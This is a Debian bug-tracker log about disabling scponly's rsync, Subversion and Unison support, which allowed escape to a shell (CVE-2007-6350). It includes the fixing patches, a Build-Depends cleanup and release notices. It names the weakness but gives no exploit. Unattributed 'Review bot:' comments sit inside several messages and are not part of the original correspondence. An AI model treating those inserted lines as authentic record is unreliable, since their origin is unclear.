> For the rest, the debian package should come without svn
> support. The README.Debian could describe the disabled features, and
> under what circumstances they are safe, and how best to recompile
> scponly.

The package could create two binaries, one that supports just
scp/sftp, and another one for the rest.

For the stable security update, it's probably best to just disable
Subversion/Unison/rsync.



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Joachim Breitner <nomeata@debian.org>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #102 received at 437148@bugs.debian.org (full text, mbox):

From: Joachim Breitner <nomeata@debian.org>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: Kaleb Pederson <kibab@icehouse.net>, 437148@bugs.debian.org, wby oblyr <joe@sublimation.org>
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Fri, 07 Sep 2007 11:01:23 +0200
Hi,

On Friday, 07.09.2007, 10:59 +0200, Florian Weimer wrote:
> * Joachim Breitner:
> >> I think mounting the file system no-exec covers that.  IIRC,
> >> Subversion directly executes the hook scripts, and this will fail in
> >> that case.
> >
> > Then this should be mentioned in the file. I also think that this is
> > quite a high hurdle: Admins that want that can surely re-compile
> > scponly.
> 
> It's mentioned in the file (item 7), but I agree that this is not the
> target group of the Debian package.

Sorry, didn’t read it all.

> > For the rest, the debian package should come without svn
> > support. The README.Debian could describe the disabled features, and
> > under what circumstances they are safe, and how best to recompile
> > scponly.
> 
> The package could create two binaries, one that supports just
> scp/sftp, and another one for the rest.

Sounds good, but that’s up to the maintainer. Thomas, are you reading
this?

> For the stable security update, it's probably best to just disable
> Subversion/Unison/rsync.

I agree.

Greetings,
Joachim

-- 
Joachim "nomeata" Breitner
Debian Developer
  nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
  JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata




Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Thomas Wana <greuff@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #107 received at 437148@bugs.debian.org (full text, mbox):

From: Thomas Wana <greuff@debian.org>
To: Joachim Breitner <nomeata@debian.org>, 437148@bugs.debian.org
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Sun, 9 Sep 2007 16:04:22 +0200
On 07.09.2007, at 11:01, Joachim Breitner wrote:

> Hi,
>
> On Friday, 07.09.2007, 10:59 +0200, Florian Weimer wrote:
>> * Joachim Breitner:
>>>> I think mounting the file system no-exec covers that.  IIRC,
>>>> Subversion directly executes the hook scripts, and this will fail in
>>>> that case.
>>>
>>> Then this should be mentioned in the file. I also think that this is
>>> quite a high hurdle: Admins that want that can surely re-compile
>>> scponly.
>>
>> It's mentioned in the file (item 7), but I agree that this is not the
>> target group of the Debian package.
>
> Sorry, didn’t read it all.
>
>>> For the rest, the debian package should come without svn
>>> support. The README.Debian could describe the disabled features, and
>>> under what circumstances they are safe, and how best to recompile
>>> scponly.
>>
>> The package could create two binaries, one that supports just
>> scp/sftp, and another one for the rest.
>
> Sounds good, but that’s up to the maintainer. Thomas, are you reading
> this?

I am; I'm doing an overhaul of the package soon.

Tom

>
>> For the stable security update, it's probably best to just disable
>> Subversion/Unison/rsync.
>
> I agree.
>
> Greetings,
> Joachim
>
> -- 
> Joachim "nomeata" Breitner
> Debian Developer
>   nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
>   JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata
>
>





Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #112 received at 437148@bugs.debian.org (full text, mbox):

From: Steffen Joeris <steffen.joeris@skolelinux.de>
To: 437148@bugs.debian.org
Subject: scponly: deactivating or splitting packages
Date: Mon, 24 Sep 2007 23:41:13 +1000
Hi

I was just wondering about the status of this security bug.
Shall we go ahead and deactivate the svn support via NMU, and you can decide
what to do later, or do you likely have the time to do the splitting?
Thanks for your feedback.

Cheers
Steffen

Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #117 received at 437148@bugs.debian.org (full text, mbox):

From: Steffen Joeris <steffen.joeris@skolelinux.de>
To: 437148@bugs.debian.org
Subject: NMU fix
Date: Tue, 25 Sep 2007 20:33:39 +1000
Hi

Below you will find the NMU patch. The issue should be out for sid now and the 
package should migrate to testing shortly.
Feel free to keep working on the package split though.

Cheers
Steffen

diff -u scponly-4.6/debian/changelog scponly-4.6/debian/changelog
--- scponly-4.6/debian/changelog
+++ scponly-4.6/debian/changelog
@@ -1,3 +1,14 @@
+scponly (4.6-1.1) unstable; urgency=high
+
+  * Non-maintainer upload by the testing-security team
+  * Disable unison, rsync and svn usability, because all three could be
+    exploited. (Closes: #437148)
+   - The maintainer is working on splitting the packages and providing
+     a binary package, which enables these features, but warns about
+     them and one, which is safe and has them disabled, like this
+
+ -- Steffen Joeris <white@debian.org>  Tue, 25 Sep 2007 10:06:31 +0000
+
 scponly (4.6-1) unstable; urgency=high

   * New upstream version 4.6. (Closes: #342701, #324918)
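Review bot: the entry says the three features are disabled because they "could be exploited", but the patch only touches the configure flags in debian/rules; debian/control keeps Build-Depends on rsync, unison and subversion, so either drop those in this upload or state in the entry that the Build-Depends cleanup is deferred to the package split. It would also help to say what the exposure was (shell access through the passthrough, as the later stable update's entry puts it) so the changelog is self-explanatory.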
diff -u scponly-4.6/debian/rules scponly-4.6/debian/rules
--- scponly-4.6/debian/rules
+++ scponly-4.6/debian/rules
@@ -26,7 +26,7 @@
 config.status: configure
        dh_testdir
        # Add here commands to configure the package.
-       ./configure 
CFLAGS='$(CFLAGS)' --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --sysconfdir=\$${prefix}/../etc --enable-scp-compat --enable-winscp-compat --enable-rsync-compat --enable-unison-compat --enable-chrooted-binary --enable-passwd-compat --enable-svn-compat 
PROG_USERADD=/usr/sbin/useradd
+       ./configure 
CFLAGS='$(CFLAGS)' --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --sysconfdir=\$${prefix}/../etc --enable-scp-compat --enable-winscp-compat --enable-chrooted-binary --enable-passwd-compat 
PROG_USERADD=/usr/sbin/useradd


 build: build-stamp
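Review bot: the replaced ./configure line is a single very long line, so the actual change (dropping --enable-rsync-compat, --enable-unison-compat and --enable-svn-compat) is hard to see in review; split the invocation with one flag per backslash-continued line so each removed flag shows up as its own '-' line, and add a comment next to it referencing #437148 so the flags are not re-added when the line is next synced with upstream's defaults.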

Reply sent to Steffen Joeris <white@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #122 received at 437148-close@bugs.debian.org (full text, mbox):

From: Steffen Joeris <white@debian.org>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.6-1.1
Date: Tue, 25 Sep 2007 10:32:03 +0000
Source: scponly
Source-Version: 4.6-1.1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1.1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1.1.diff.gz
scponly_4.6-1.1.dsc
  to pool/main/s/scponly/scponly_4.6-1.1.dsc
scponly_4.6-1.1_i386.deb
  to pool/main/s/scponly/scponly_4.6-1.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Steffen Joeris <white@debian.org> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Tue, 25 Sep 2007 10:06:31 +0000
Source: scponly
Binary: scponly
Architecture: source i386
Version: 4.6-1.1
Distribution: unstable
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Steffen Joeris <white@debian.org>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1.1) unstable; urgency=high
 .
   * Non-maintainer upload by the testing-security team
   * Disable unison, rsync and svn usability, because all three could be
     exploited. (Closes: #437148)
    - The maintainer is working on splitting the packages and providing
      a binary package, which enables these features, but warns about
      them and one, which is safe and has them disabled, like this
Files: 
 cbc36940db279059d177f6fcef59ecec 592 utils optional scponly_4.6-1.1.dsc
 e5c1efbf4f95143271b5259d6a3765f2 28435 utils optional scponly_4.6-1.1.diff.gz
 f8e48b6b8bb8066570ce13eec06647a7 33012 utils optional scponly_4.6-1.1_i386.deb



Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to "Tatsuo Sekine" <sekine.t@gmail.com>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #127 received at 437148@bugs.debian.org (full text, mbox):

From: "Tatsuo Sekine" <sekine.t@gmail.com>
To: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Tue, 25 Dec 2007 11:26:25 +0900
Now rsync, unison and subversion are not supported.
So those should be removed from the build dependencies.

--- scponly-4.6-1.1/debian/control      2007-12-25 11:21:34.000000000 +0900
+++ scponly/debian/control      2007-12-25 11:23:01.000000000 +0900
@@ -2,7 +2,7 @@
 Section: utils
 Priority: optional
 Maintainer: Thomas Wana <greuff@debian.org>
-Build-Depends: debhelper (>= 4.1.16), rsync, ssh, unison, subversion
+Build-Depends: debhelper (>= 4.1.16), ssh
 Standards-Version: 3.6.1.0

 Package: scponly
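Review bot: the new Build-Depends keeps ssh as the only provider of the binaries that configure probes for (sftp-server and scp); since those come from openssh-server and openssh-client respectively, list both packages explicitly rather than relying on ssh to pull them in: `Build-Depends: debhelper (>= 4.1.16), openssh-client, openssh-server`.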

-- 
Tatsuo Sekine




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #132 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: "Tatsuo Sekine" <sekine.t@gmail.com>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Tue, 25 Dec 2007 16:01:07 +0100
* Tatsuo Sekine:

> Now rsync, unison and subversion are not supported.
> So those should be removed from the build dependencies.
>
> --- scponly-4.6-1.1/debian/control      2007-12-25 11:21:34.000000000 +0900
> +++ scponly/debian/control      2007-12-25 11:23:01.000000000 +0900
> @@ -2,7 +2,7 @@
>  Section: utils
>  Priority: optional
>  Maintainer: Thomas Wana <greuff@debian.org>
> -Build-Depends: debhelper (>= 4.1.16), rsync, ssh, unison, subversion
> +Build-Depends: debhelper (>= 4.1.16), ssh

Is the SSH dependency really necessary?




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to "Tatsuo Sekine" <sekine.t@gmail.com>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #137 received at 437148@bugs.debian.org (full text, mbox):

From: "Tatsuo Sekine" <sekine.t@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Wed, 26 Dec 2007 10:03:29 +0900
The configure script tries to detect the locations of the sftp-server and scp binaries.

All binaries that will be run via scponly should be listed with their full
paths, because scponly restricts which executables may run.

On Dec 26, 2007 12:01 AM, Florian Weimer <fw@deneb.enyo.de> wrote:
> * Tatsuo Sekine:
>
> > Now rsync, unison and subversion are not supported.
> > So those should be removed from the build dependencies.
> >
> > --- scponly-4.6-1.1/debian/control      2007-12-25 11:21:34.000000000 +0900
> > +++ scponly/debian/control      2007-12-25 11:23:01.000000000 +0900
> > @@ -2,7 +2,7 @@
> >  Section: utils
> >  Priority: optional
> >  Maintainer: Thomas Wana <greuff@debian.org>
> > -Build-Depends: debhelper (>= 4.1.16), rsync, ssh, unison, subversion
> > +Build-Depends: debhelper (>= 4.1.16), ssh
>
> Is the SSH dependency really necessary?
>



-- 
Tatsuo Sekine




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #142 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: "Tatsuo Sekine" <sekine.t@gmail.com>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Wed, 26 Dec 2007 07:54:13 +0100
* Tatsuo Sekine:

> Configure script tries to detect sftp-server and scp binary location.

Ah, then a dependency on openssh-client is sufficient (ssh is
essentially openssh-server).




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to "Tatsuo Sekine" <sekine.t@gmail.com>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #147 received at 437148@bugs.debian.org (full text, mbox):

From: "Tatsuo Sekine" <sekine.t@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Wed, 26 Dec 2007 16:53:18 +0900
sftp-server is in the openssh-server package and scp is in the openssh-client package.
So both the server and client packages should be listed in the build dependencies.

On Dec 26, 2007 3:54 PM, Florian Weimer <fw@deneb.enyo.de> wrote:
> * Tatsuo Sekine:
>
> > Configure script tries to detect sftp-server and scp binary location.
>
> Ah, then a dependency on openssh-client is sufficient (ssh is
> essentially openssh-server).

-- 
Tatsuo Sekine




Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #152 received at 437148-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.6-1etch1
Date: Wed, 23 Jan 2008 19:52:12 +0000
Source: scponly
Source-Version: 4.6-1etch1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1etch1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1etch1.diff.gz
scponly_4.6-1etch1.dsc
  to pool/main/s/scponly/scponly_4.6-1etch1.dsc
scponly_4.6-1etch1_amd64.deb
  to pool/main/s/scponly/scponly_4.6-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Tue, 25 Dec 2007 14:11:00 +0100
Source: scponly
Binary: scponly
Architecture: source amd64
Version: 4.6-1etch1
Distribution: stable-security
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1etch1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 c02dfefb7289fcb09e9ac83d7cf78655 890 utils optional scponly_4.6-1etch1.dsc
 0425cb868cadd026851238452f1db907 96578 utils optional scponly_4.6.orig.tar.gz
 a588cb9138820d73f16bc81ffc4f8e20 28528 utils optional scponly_4.6-1etch1.diff.gz
 2bb425113107e4e471c15685333f1a0a 34214 utils optional scponly_4.6-1etch1_amd64.deb



Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #157 received at 437148-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.0-1sarge2
Date: Mon, 28 Jan 2008 19:52:18 +0000
Source: scponly
Source-Version: 4.0-1sarge2

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.0-1sarge2.diff.gz
  to pool/main/s/scponly/scponly_4.0-1sarge2.diff.gz
scponly_4.0-1sarge2.dsc
  to pool/main/s/scponly/scponly_4.0-1sarge2.dsc
scponly_4.0-1sarge2_i386.deb
  to pool/main/s/scponly/scponly_4.0-1sarge2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Tue, 25 Dec 2007 13:27:52 +0100
Source: scponly
Binary: scponly
Architecture: source i386
Version: 4.0-1sarge2
Distribution: oldstable-security
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.0-1sarge2) oldstable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 f37d3236975bdb6742eba5ac788c40c2 892 utils optional scponly_4.0-1sarge2.dsc
 380ea78eb602749989c8031a4f916c79 27490 utils optional scponly_4.0-1sarge2.diff.gz
 62413a011d04721bb4b6f9a3d9496e27 29322 utils optional scponly_4.0-1sarge2_i386.deb



Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #162 received at 437148-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.6-1etch1
Date: Sat, 16 Feb 2008 12:17:28 +0000
Source: scponly
Source-Version: 4.6-1etch1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1etch1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1etch1.diff.gz
scponly_4.6-1etch1.dsc
  to pool/main/s/scponly/scponly_4.6-1etch1.dsc
scponly_4.6-1etch1_amd64.deb
  to pool/main/s/scponly/scponly_4.6-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Tue, 25 Dec 2007 14:11:00 +0100
Source: scponly
Binary: scponly
Architecture: source amd64
Version: 4.6-1etch1
Distribution: stable-security
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1etch1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 c02dfefb7289fcb09e9ac83d7cf78655 890 utils optional scponly_4.6-1etch1.dsc
 0425cb868cadd026851238452f1db907 96578 utils optional scponly_4.6.orig.tar.gz
 a588cb9138820d73f16bc81ffc4f8e20 28528 utils optional scponly_4.6-1etch1.diff.gz
 2bb425113107e4e471c15685333f1a0a 34214 utils optional scponly_4.6-1etch1_amd64.deb



Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 16 Mar 2008 07:30:59 GMT) Full text and rfc822 format available.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 14:05:41 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.